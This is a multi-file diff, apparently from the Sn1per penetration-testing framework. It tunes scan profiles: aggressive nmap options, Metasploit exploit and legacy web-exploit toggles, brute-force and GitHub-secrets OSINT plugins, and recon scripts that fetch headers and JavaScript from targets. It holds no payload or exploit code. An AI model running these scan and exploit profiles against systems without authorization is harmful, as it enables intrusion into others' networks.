||||
SHODAN_API_KEY=""
|
||||
|
||||
# API KEYS
|
||||
# CENSYS API KEYS
|
||||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
|
|
@ -58,26 +59,26 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="1"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -106,7 +107,7 @@ FLYOVER_MAX_HOSTS="5"
|
|||
FLYOVER_DELAY="10"
|
||||
|
||||
# NMAP OPTIONS
|
||||
NMAP_OPTIONS="-sV -Pn -O -v --script-args http.useragent=''"
|
||||
NMAP_OPTIONS="-sV -Pn -O --osscan-guess --max-os-tries 1 --privileged -n -PE -v --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --script-args=vulns.showall --script-timeout 180 --data-length=50 --script-args http.useragent='' --min-parallelism 100"
|
||||
|
||||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,111,135,137,138,139,143,161,162,443,445,512,513,514,993,995,1099,1433,1723,3306,3389,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8443,8888,8000,9080,9443,10000,10250,49180"
|
||||
|
|
@ -122,6 +123,7 @@ THREADS="100"
|
|||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="1"
|
||||
METASPLOIT_EXPLOIT="0"
|
||||
MSF_LEGACY_WEB_EXPLOITS="0"
|
||||
SSH_AUDIT="0"
|
||||
SHOW_MOUNT="0"
|
||||
RPC_INFO="0"
|
||||
|
|
@ -166,8 +168,8 @@ HTTP_PROBE="1"
|
|||
# ACTIVE WEB BRUTE FORCE STAGES
|
||||
WEB_BRUTE_STEALTHSCAN="1"
|
||||
WEB_BRUTE_COMMONSCAN="1"
|
||||
WEB_BRUTE_FULLSCAN="1"
|
||||
WEB_BRUTE_EXPLOITSCAN="1"
|
||||
WEB_BRUTE_FULLSCAN="0"
|
||||
WEB_BRUTE_EXPLOITSCAN="0"
|
||||
WEB_JAVASCRIPT_ANALYSIS="1"
|
||||
MAX_JAVASCRIPT_FILES="25"
|
||||
|
||||
|
|
@ -176,6 +178,7 @@ WAYBACKMACHINE="1"
|
|||
SSL="0"
|
||||
PASSIVE_SPIDER="1"
|
||||
HACKERTARGET="1"
|
||||
GUA="1"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="1"
|
||||
|
||||
|
|
@ -203,4 +206,5 @@ SHODAN="1"
|
|||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
SUBBRUTE_DNS="0"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
RAPIDDNS="1"
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
71
conf/default
71
conf/default
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
|
@ -16,14 +16,14 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE=""
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="2000"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
|
|
@ -41,13 +41,14 @@ OPENVAS_USERNAME="admin"
|
|||
OPENVAS_PASSWORD=""
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
METASPLOIT_IMPORT="0"
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# SHODAN API KEY
|
||||
SHODAN_API_KEY=""
|
||||
|
||||
# API KEYS
|
||||
# CENSYS API KEYS
|
||||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
|
|
@ -58,26 +59,26 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="1"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -106,7 +107,7 @@ FLYOVER_MAX_HOSTS="5"
|
|||
FLYOVER_DELAY="10"
|
||||
|
||||
# NMAP OPTIONS
|
||||
NMAP_OPTIONS="-sV -Pn -O -v --script-args http.useragent=''"
|
||||
NMAP_OPTIONS="-Pn -sS --privileged -n -PE -v --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --script-args=vulns.showall --script-timeout 180 --data-length=50 --script-args http.useragent='' --min-parallelism 100"
|
||||
|
||||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,111,135,137,138,139,143,161,162,443,445,512,513,514,993,995,1099,1433,1723,3306,3389,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8443,8888,8000,9080,9443,10000,10250,49180"
|
||||
|
|
@ -122,6 +123,7 @@ THREADS="100"
|
|||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="1"
|
||||
METASPLOIT_EXPLOIT="0"
|
||||
MSF_LEGACY_WEB_EXPLOITS="0"
|
||||
SSH_AUDIT="0"
|
||||
SHOW_MOUNT="0"
|
||||
RPC_INFO="0"
|
||||
|
|
@ -175,6 +177,7 @@ WAYBACKMACHINE="1"
|
|||
SSL="0"
|
||||
PASSIVE_SPIDER="1"
|
||||
HACKERTARGET="1"
|
||||
GUA="1"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="1"
|
||||
|
||||
|
|
@ -202,4 +205,5 @@ SHODAN="1"
|
|||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
SUBBRUTE_DNS="0"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
RAPIDDNS="1"
|
||||
|
|
@ -16,14 +16,14 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE=""
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="2000"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
|
|
@ -41,13 +41,14 @@ OPENVAS_USERNAME="admin"
|
|||
OPENVAS_PASSWORD=""
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
METASPLOIT_IMPORT="0"
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# SHODAN API KEY
|
||||
SHODAN_API_KEY=""
|
||||
|
||||
# API KEYS
|
||||
# CENSYS API KEYS
|
||||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
|
|
@ -58,26 +59,26 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="1"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -106,7 +107,7 @@ FLYOVER_MAX_HOSTS="5"
|
|||
FLYOVER_DELAY="10"
|
||||
|
||||
# NMAP OPTIONS
|
||||
NMAP_OPTIONS="-sV -Pn -O -v --script-args http.useragent=''"
|
||||
NMAP_OPTIONS="-sV -Pn -O --osscan-guess --max-os-tries 1 --privileged -n -PE -v --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --script-args=vulns.showall --script-timeout 180 --data-length=50 --script-args http.useragent='' --min-parallelism 100"
|
||||
|
||||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,111,135,137,138,139,143,161,162,443,445,512,513,514,993,995,1099,1433,1723,3306,3389,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8443,8888,8000,9080,9443,10000,10250,49180"
|
||||
|
|
@ -122,6 +123,7 @@ THREADS="100"
|
|||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="1"
|
||||
METASPLOIT_EXPLOIT="0"
|
||||
MSF_LEGACY_WEB_EXPLOITS="0"
|
||||
SSH_AUDIT="0"
|
||||
SHOW_MOUNT="0"
|
||||
RPC_INFO="0"
|
||||
|
|
@ -130,7 +132,7 @@ AMAP="0"
|
|||
YASUO="0"
|
||||
|
||||
# OSINT PLUGINS
|
||||
WHOIS="0"
|
||||
WHOIS="1"
|
||||
GOOHAK="1"
|
||||
INURLBR="1"
|
||||
THEHARVESTER="1"
|
||||
|
|
@ -139,10 +141,10 @@ HUNTERIO="1"
|
|||
INTODNS="0"
|
||||
EMAILFORMAT="1"
|
||||
ULTRATOOLS="1"
|
||||
URLCRAZY="0"
|
||||
URLCRAZY="1"
|
||||
VHOSTS="0"
|
||||
H8MAIL="1"
|
||||
GITHUB_SECRETS="0"
|
||||
GITHUB_SECRETS="1"
|
||||
|
||||
# ACTIVE WEB PLUGINS
|
||||
BURP_SCAN="0"
|
||||
|
|
@ -175,6 +177,7 @@ WAYBACKMACHINE="1"
|
|||
SSL="0"
|
||||
PASSIVE_SPIDER="1"
|
||||
HACKERTARGET="1"
|
||||
GUA="1"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="1"
|
||||
|
||||
|
|
@ -202,4 +205,5 @@ SHODAN="1"
|
|||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
SUBBRUTE_DNS="0"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
GITHUB_SUBDOMAINS="1"
|
||||
RAPIDDNS="1"
|
||||
File diff suppressed because one or more lines are too long
|
|
@ -16,14 +16,14 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE=""
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="2000"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
|
|
@ -41,13 +41,14 @@ OPENVAS_USERNAME="admin"
|
|||
OPENVAS_PASSWORD=""
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
METASPLOIT_IMPORT="0"
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# SHODAN API KEY
|
||||
SHODAN_API_KEY=""
|
||||
|
||||
# API KEYS
|
||||
# CENSYS API KEYS
|
||||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
|
|
@ -58,26 +59,26 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="1"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -106,7 +107,7 @@ FLYOVER_MAX_HOSTS="5"
|
|||
FLYOVER_DELAY="10"
|
||||
|
||||
# NMAP OPTIONS
|
||||
NMAP_OPTIONS="-sV -Pn -O -v --script-args http.useragent=''"
|
||||
NMAP_OPTIONS="-sV -Pn -O --osscan-guess --max-os-tries 1 --privileged -n -PE -v --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --script-args=vulns.showall --script-timeout 180 --data-length=50 --script-args http.useragent='' --min-parallelism 100"
|
||||
|
||||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,111,135,137,138,139,143,161,162,443,445,512,513,514,993,995,1099,1433,1723,3306,3389,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8443,8888,8000,9080,9443,10000,10250,49180"
|
||||
|
|
@ -122,6 +123,7 @@ THREADS="100"
|
|||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="0"
|
||||
METASPLOIT_EXPLOIT="1"
|
||||
MSF_LEGACY_WEB_EXPLOITS="1"
|
||||
SSH_AUDIT="0"
|
||||
SHOW_MOUNT="0"
|
||||
RPC_INFO="0"
|
||||
|
|
@ -174,6 +176,7 @@ WAYBACKMACHINE="0"
|
|||
SSL="0"
|
||||
PASSIVE_SPIDER="0"
|
||||
HACKERTARGET="0"
|
||||
GUA="0"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="0"
|
||||
|
||||
|
|
@ -200,4 +203,5 @@ DNSGEN="0"
|
|||
SHODAN="0"
|
||||
ASN_CHECK="0"
|
||||
SPYSE="0"
|
||||
SUBBRUTE_DNS="0"
|
||||
SUBBRUTE_DNS="0"
|
||||
RAPIDDNS="0"
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
|
@ -151,6 +151,8 @@ cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/
|
|||
GO111MODULE=on go get -u github.com/theblackturtle/fprobe; ln -s ~/go/bin/fprobe /usr/bin/fprobe
|
||||
go get github.com/harleo/asnip
|
||||
ln -s ~/go/bin/asnip /usr/bin/asnip 2>/dev/null
|
||||
GO111MODULE=on go get -u -v github.com/lc/gau
|
||||
ln -s /root/go/bin/gau /usr/bin/gau2
|
||||
rm -Rf ~/go/src/amass*
|
||||
wget https://github.com/OWASP/Amass/releases/download/v3.5.4/amass_v3.5.4_linux_amd64.zip -O ~/go/src/amass.zip
|
||||
cd ~/go/src/
|
||||
|
|
|
|||
|
|
@ -65,6 +65,7 @@ if [[ "$MODE" = "discover" ]]; then
|
|||
echo ""
|
||||
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt "
|
||||
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET"
|
||||
source modes/sc0pe.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -60,8 +60,8 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
|
||||
curl --connect-timeout 5 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -I -s -R --insecure http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -I -s -R --insecure https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
|
||||
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
|
||||
|
|
@ -107,8 +107,8 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
if [[ ${#HOST_UP} -ge 2 ]]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
|
||||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -59,8 +59,9 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
fi
|
||||
source modes/sc0pe.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -4,6 +4,8 @@
|
|||
echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
for a in `grep "\.js" $LOOT_DIR/web/spider-$TARGET.txt | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
for a in `grep "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
